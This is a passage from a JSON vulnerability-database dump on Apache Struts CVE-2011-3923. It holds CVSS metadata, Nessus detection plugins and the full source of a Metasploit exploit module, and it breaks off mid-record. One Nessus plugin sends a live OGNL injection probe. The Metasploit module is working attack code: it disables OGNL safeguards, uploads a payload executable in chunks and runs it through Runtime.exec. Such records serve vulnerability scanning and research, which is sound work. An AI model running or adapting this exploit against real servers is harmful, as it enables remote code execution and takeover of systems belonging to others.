v2\r\n\r\niQEcBAEBAgAGBQJTvmP8AAoJECyFJyAEdlkKIvIH/jN5QXxf98jLswdxXH7bpHND\r\nOmX43+f2o119h7jphQierfe2Fj5NqG3l+9Gldb601SYtdOXldI5Dn/GSByZb0NbD\r\nXn5i9SeRNzbxPghCX7JubHaJX86HKoxrks34Hgoe7/v5A4rkIs3XA868tIODWq/j\r\nFCSnwn3I7DQu8lSR1PzbzTX2aOnilTAdmSTFH5MahMXrVgk3YHwNbtVIDz6/xriW\r\nynsvLr709i/fQWEhwo4OoTwhyHwhrjPjY3jQNhcO70OMjG1kWqULFySGWNeVof0k\r\na2K/EHcqiDPFyrpHifvVheOeQaPoFO5CL/Ze7cV7B9vRi9WPo3Y07wNfnJiYOdY=\r\n=3Hvl\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-10-16T00:00:00", "title": "SEC Consult SA-20140710-0 :: Multiple critical vulnerabilities in Shopizer webshop", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2014-10-16T00:00:00", "id": "SECURITYVULNS:DOC:31277", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31277", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-01-11T14:20:59", "description": "The remote web application appears to use Apache Struts 2, a web framework that uses XWork. Due to a flaw in the ParameterInterceptor class, user input is not properly sanitized, which allows a remote attacker to run arbitrary Java code on the remote host by sending a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2012-02-06T00:00:00", "type": "nessus", "title": "Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE2.NASL", "href": "https://www.tenable.com/plugins/nessus/57850", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57850);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2011-3923\");\n script_bugtraq_id(51628);\n script_xref(name:\"EDB-ID\", value:\"24874\");\n\n script_name(english:\"Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A remote web application uses a framework that is affected by a code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Apache Struts 2, a web\nframework that uses XWork. Due to a flaw in the ParameterInterceptor\nclass, user input is not properly sanitized, which allows a remote\nattacker to run arbitrary Java code on the remote host by sending a\nspecially crafted HTTP request.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-009\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Struts 2.3.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3923\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ParametersInterceptor Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"White_Phosphorus\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"torture_cgi.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = make_list(urls, \"/\");\n\nurls = list_uniq(urls);\n\nsecs = make_list(5, 10, 20);\nvuln_actions = make_list();\n\nforeach dir (urls)\n{\n # find a list of args to test against\n cgi_args = get_cgi_arg_list(port: port, cgi: dir);\n foreach arg (cgi_args)\n {\n # assume the action is vulnerable unless proven otherwise\n vuln = TRUE;\n for (i = 0; i < max_index(secs) && vuln; i++)\n {\n millis = secs[i] * 1000;\n ognl = arg +\n '=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]' +\n '%3D+new+java.lang.Boolean(false),' +\n '%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d' +\n '+new+java.lang.Boolean(true),%20'+\n '@java.lang.Thread@sleep(' + millis + '))(meh)&z[('+arg+')' +\n '(%27meh%27)]=true';\n url = dir + '?' + ognl;\n http_set_read_timeout(secs[i] * 2);\n then = unixtime();\n res = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n exit_on_fail:TRUE\n );\n now = unixtime();\n\n # if it looks like this action isn't vulnerable, move on to checking\n # the next one\n if ( now - then < secs[i] || now - then > (secs[i]+5) ) vuln = FALSE;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No affected applications were detected on the web server listening on port '+port+'.');\n\nif (report_verbosity > 0)\n{\n report = get_vuln_report(\n header:\n 'Nessus determined a struts 2 application is vulnerable by\\n'+\n 'forcing it to sleep() before sending the server\\'s response.\\n'+\n 'This was verified using the following URL :',\n trailer:\n 'Please note Nessus stopped after detecting the first vulnerable\\n'+\n 'application. Others may be affected.',\n items:url,\n port:port\n );\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:25", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.1.2. It, therefore, is affected a possible remote command execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.1.2 RCE (S2-009)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117403", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117403);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2011-3923\");\n script_bugtraq_id(51628);\n\n script_name(english:\"Apache Struts 2.x < 2.3.1.2 RCE (S2-009)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.1.2. It, therefore, is affected a possible remote\ncommand execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-009\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.1.2 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3923\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ParametersInterceptor Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"White_Phosphorus\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.1.1\", \"fixed_version\" : \"2.3.1.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:04:44", "description": "The version of Apache Struts running on the remote host is prior to 2.3.1.1. It, therefore, affected by multiple vulnerabilities:\n\n - The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. (CVE-2012-0392)\n\n - Apache Struts before 2.3.1.2 allows remote attackers to bypass security protections in the ParameterInterceptor class and execute arbitrary commands. (CVE-2011-3923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-20T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3923", "CVE-2012-0392"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_1_1_REAL.NASL", "href": "https://www.tenable.com/plugins/nessus/143125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143125);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2011-3923\", \"CVE-2012-0392\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is prior to 2.3.1.1. It, therefore, affected by multiple\nvulnerabilities:\n\n - The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which\n allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code\n execution through a static method. (CVE-2012-0392)\n\n - Apache Struts before 2.3.1.2 allows remote attackers to bypass security protections in the ParameterInterceptor\n class and execute arbitrary commands. (CVE-2011-3923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-008\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.1.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0392\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Windows\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ParametersInterceptor Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"White_Phosphorus\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '2.0.0', 'fixed_version' : '2.3.1.1' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-11-13T06:44:01", "description": "This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret parameter values as OGNL expressions during certain exception handling for mismatched data types of properties which allows remote attackers to execute arbitrary Java code via a crafted parameter.\n", "cvss3": {}, "published": "2013-03-21T13:40:16", "type": "metasploit", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS_CODE_EXEC_PARAMETERS-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts_code_exec_parameters/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',\n 'Description' => %q{\n This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\n for the use of parentheses which in turn allows it to interpret parameter values as\n OGNL expressions during certain exception handling for mismatched data types of\n properties which allows remote attackers to execute arbitrary Java code via a\n crafted parameter.\n },\n 'Author' =>\n [\n 'Meder Kydyraliev', # Vulnerability Discovery and PoC\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module\n 'mihi', #ARCH_JAVA support\n 'Christian Mehlmauer' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-3923'],\n [ 'OSVDB', '78501'],\n [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']\n ],\n 'Platform' => %w{ java linux win },\n 'Privileged' => true,\n 'Targets' =>\n [\n ['Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n ['Linux Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ],\n [ 'Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n },\n ]\n ],\n 'DisclosureDate' => '2011-10-01',\n 'DefaultTarget' => 2))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),\n OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format \"param1=a&param2=b\". Do apply URL encoding to the parameters names and values if needed.', nil]),\n OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil])\n ])\n end\n\n def parameter\n datastore['PARAMETER']\n end\n\n def temp_path\n return nil unless datastore['TMP_PATH']\n unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\\\')\n fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')\n end\n datastore['TMP_PATH']\n end\n\n def get_parameter\n retval = {}\n return retval unless datastore['GET_PARAMETERS']\n splitted = datastore['GET_PARAMETERS'].split('&')\n return retval if splitted.nil? || splitted.empty?\n splitted.each { |item|\n name, value = item.split('=')\n # no check here, value can be nil if parameter is &param\n decoded_name = name ? Rex::Text::uri_decode(name) : nil\n decoded_value = value ? Rex::Text::uri_decode(value) : nil\n retval[decoded_name] = decoded_value\n }\n retval\n end\n\n def execute_command(cmd)\n junk = Rex::Text.rand_text_alpha(6)\n inject = \"(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]= new java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\"\n inject << \"= new java.lang.Boolean(true),#{cmd})('#{junk}')\"\n uri = normalize_uri(datastore['TARGETURI'])\n resp = send_request_cgi({\n 'uri' => uri,\n 'version' => '1.1',\n 'method' => 'GET',\n 'vars_get' => { parameter => inject, \"z[(#{parameter})(#{junk})]\" => 'true' }.merge(get_parameter)\n })\n resp\n end\n\n def exploit\n #Set up generic values.\n payload_exe = rand_text_alphanumeric(4 + rand(4))\n\n append = false\n #Now arch specific...\n case target['Platform']\n when 'linux'\n pl_exe = generate_payload_exe\n path = temp_path || '/tmp/'\n payload_exe = \"#{path}#{payload_exe}\"\n chmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{payload_exe}\\\".split(\\\"_\\\"))\"\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{payload_exe}\\\".split(\\\"_\\\"))\"\n when 'java'\n payload_exe = \"#{temp_path}#{payload_exe}.jar\"\n pl_exe = payload.encoded_jar.pack\n exec_cmd = ''\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\n exec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),\"\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\n when 'win'\n pl_exe = generate_payload_exe\n path = temp_path || './'\n payload_exe = \"#{path}#{payload_exe}.exe\"\n exec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{payload_exe}')\"\n else\n fail_with(Failure::NoTarget, 'Unsupported target platform!')\n end\n\n print_status(\"Uploading exploit to #{payload_exe}\")\n #Now with all the arch specific stuff set, perform the upload.\n #109 = length of command string plus the max length of append.\n sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length\n chunk_length = 2048 - sub_from_chunk\n chunk_length = ((chunk_length/4).floor) * 3\n while pl_exe.length > chunk_length\n java_upload_part(pl_exe[0,chunk_length], payload_exe, append)\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\n append = true\n end\n java_upload_part(pl_exe, payload_exe, append)\n print_status(\"Executing payload\")\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\n execute_command(exec_cmd)\n register_files_for_cleanup(payload_exe)\n end\n\n def java_upload_part(part, filename, append = false)\n cmd = \"\"\n cmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\n cmd << \"#f.close()\"\n execute_command(cmd)\n end\n\n def check\n sleep_time = datastore['CHECK_SLEEPTIME']\n check_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\"\n t1 = Time.now\n vprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\n response = execute_command(check_cmd)\n t2 = Time.now\n delta = t2 - t1\n\n if response.nil?\n return Exploit::CheckCode::Safe\n elsif delta < sleep_time\n return Exploit::CheckCode::Safe\n else\n return Exploit::CheckCode::Appears\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts_code_exec_parameters.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nShopizer 1.1.5 - Multiple Vulnerabilities", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-07-14T00:00:00", "title": "Shopizer 1.1.5 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2014-07-14T00:00:00", "id": "EXPLOITPACK:4BC3373D8B033302B0D62E73E77241B4", "href": "", "sourceData": 